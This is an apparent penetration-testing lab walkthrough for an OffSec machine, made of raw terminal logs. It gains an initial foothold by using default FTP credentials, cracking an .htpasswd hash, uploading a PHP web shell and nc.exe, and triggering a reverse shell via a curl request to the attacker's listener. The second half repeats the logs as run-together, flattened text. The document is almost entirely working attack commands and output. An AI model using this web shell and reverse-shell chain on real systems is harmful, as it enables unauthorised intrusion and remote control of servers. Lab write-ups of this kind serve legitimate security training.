Foothold

Offsec:offsec

❯ ftp 192.168.207.46 3145
Connected to 192.168.207.46.
220 .
Name (192.168.207.46:adot): Offsec
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||2116|)
150 Opening connection for /bin/ls.
total 0
drw-rw-r--   1 root     root          512 Oct 21 12:05 E:DRIVE_CDROM:<CD-Rom>
drw-rw-r--   1 root     root          512 Oct 21 12:05 D:DRIVE_CDROM:<CD-Rom>
drw-rw-r--   1 root     root          512 Oct 21 12:05 C:DRIVE_FIXED:
drw-rw-r--   1 root     root          512 Oct 21 12:05 $:NETWORK_NEIGHBORHOOD:
226 Closing data connection.

admin:admin

ftp> get index.php
local: index.php remote: index.php
229 Entering Extended Passive Mode (|||2216|)
150 File status okay; about to open data connection.
100% |*************************************************|    76      824.65 KiB/s    00:00 ETA
226 Closing data connection.
76 bytes received in 00:00 (0.96 KiB/s)
ftp> get .htpasswd
local: .htpasswd remote: .htpasswd
229 Entering Extended Passive Mode (|||2217|)
150 File status okay; about to open data connection.
100% |*************************************************|    45      646.25 KiB/s    00:00 ETA
226 Closing data connection.
45 bytes received in 00:00 (0.49 KiB/s)
ftp> get .ht
.htaccess       .htpasswd
ftp> get .htaccess
local: .htaccess remote: .htaccess
229 Entering Extended Passive Mode (|||2218|)
150 File status okay; about to open data connection.
100% |*************************************************|   161        2.29 MiB/s    00:00 ETA
226 Closing data connection.
161 bytes received in 00:00 (1.86 KiB/s)

❯ hashcat -m 1600 offsec.hash ~/rockyou.txt -O --user --show
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite

offsec:elite

❯ ftp 192.168.207.46
Connected to 192.168.207.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.207.46:adot): admin
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||2220|)
150 File status okay; about to open data connection.
100% |*************************************************|     5       40.68 KiB/s    00:00 ETA
226 Closing data connection.
5 bytes sent in 00:00 (0.06 KiB/s)

❯ echo '<?php echo shell_exec($_GET[:cmd"]); ?>' > cmd.php

ftp> put cmd.php
local: shell.php remote: cmd.php
229 Entering Extended Passive Mode (|||2221|)
150 File status okay; about to open data connection.
100% |*************************************************|  9409       66.96 MiB/s    00:00 ETA
226 Closing data connection.
9409 bytes sent in 00:00 (103.04 KiB/s)

ftp> put nc.exe
local: nc.exe remote: nc.exe
229 Entering Extended Passive Mode (|||2226|)
150 File status okay; about to open data connection.
100% |*************************************************| 59392      519.23 KiB/s    00:00 ETA
226 Closing data connection.
59392 bytes sent in 00:00 (354.39 KiB/s)

❯ curl -H 'Authorization: Basic b2Zmc2VjOmVsaXRl' http://192.168.207.46:242/cmd1.php\?cmd\=nc.exe+192.168.45.239+1337+-e+cmd.exe

❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.207.46] 49163
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\wamp\www>whoami && type C:\Users\apache\Desktop\local.txt && ipconfig
whoami && type C:\Users\apache\Desktop\local.txt && ipconfig
livda\apache
b0f04e4444466725def304f2682457e6

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::9c3c:65f6:f306:59ff%12
   IPv4 Address. . . . . . . . . . . : 192.168.207.46
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.207.254

Tunnel adapter Local Area Connection*:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Previous242 NextPriv Esc

Last updated 6 months ago

❯ ftp 192.168.207.46 3145 Connected to 192.168.207.46. 220 . Name (192.168.207.46:adot): Offsec 331 User name received, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||2116|) 150 Opening connection for /bin/ls. total 0 drw-rw-r-- 1 root root 512 Oct 21 12:05 E:DRIVE_CDROM:<CD-Rom> drw-rw-r-- 1 root root 512 Oct 21 12:05 D:DRIVE_CDROM:<CD-Rom> drw-rw-r-- 1 root root 512 Oct 21 12:05 C:DRIVE_FIXED: drw-rw-r-- 1 root root 512 Oct 21 12:05 $:NETWORK_NEIGHBORHOOD: 226 Closing data connection.

ftp> get index.php local: index.php remote: index.php 229 Entering Extended Passive Mode (|||2216|) 150 File status okay; about to open data connection. 100% |*************************************************| 76 824.65 KiB/s 00:00 ETA 226 Closing data connection. 76 bytes received in 00:00 (0.96 KiB/s) ftp> get .htpasswd local: .htpasswd remote: .htpasswd 229 Entering Extended Passive Mode (|||2217|) 150 File status okay; about to open data connection. 100% |*************************************************| 45 646.25 KiB/s 00:00 ETA 226 Closing data connection. 45 bytes received in 00:00 (0.49 KiB/s) ftp> get .ht .htaccess .htpasswd ftp> get .htaccess local: .htaccess remote: .htaccess 229 Entering Extended Passive Mode (|||2218|) 150 File status okay; about to open data connection. 100% |*************************************************| 161 2.29 MiB/s 00:00 ETA 226 Closing data connection. 161 bytes received in 00:00 (1.86 KiB/s)

❯ ftp 192.168.207.46 Connected to 192.168.207.46. 220 zFTPServer v6.0, build 2011-10-17 15:25 ready. Name (192.168.207.46:adot): admin 331 User name received, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> put test.txt local: test.txt remote: test.txt 229 Entering Extended Passive Mode (|||2220|) 150 File status okay; about to open data connection. 100% |*************************************************| 5 40.68 KiB/s 00:00 ETA 226 Closing data connection. 5 bytes sent in 00:00 (0.06 KiB/s)

ftp> put cmd.php local: shell.php remote: cmd.php 229 Entering Extended Passive Mode (|||2221|) 150 File status okay; about to open data connection. 100% |*************************************************| 9409 66.96 MiB/s 00:00 ETA 226 Closing data connection. 9409 bytes sent in 00:00 (103.04 KiB/s)

ftp> put nc.exe local: nc.exe remote: nc.exe 229 Entering Extended Passive Mode (|||2226|) 150 File status okay; about to open data connection. 100% |*************************************************| 59392 519.23 KiB/s 00:00 ETA 226 Closing data connection. 59392 bytes sent in 00:00 (354.39 KiB/s)

❯ nc -lnvp 1337 listening on [any] 1337 ... connect to [192.168.45.239] from (UNKNOWN) [192.168.207.46] 49163 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation. All rights reserved. C:\wamp\www>whoami && type C:\Users\apache\Desktop\local.txt && ipconfig whoami && type C:\Users\apache\Desktop\local.txt && ipconfig livda\apache b0f04e4444466725def304f2682457e6 Windows IP Configuration Ethernet adapter Local Area Connection 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::9c3c:65f6:f306:59ff%12 IPv4 Address. . . . . . . . . . . : 192.168.207.46 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.207.254 Tunnel adapter Local Area Connection*: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter Local Area Connection* 9: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . :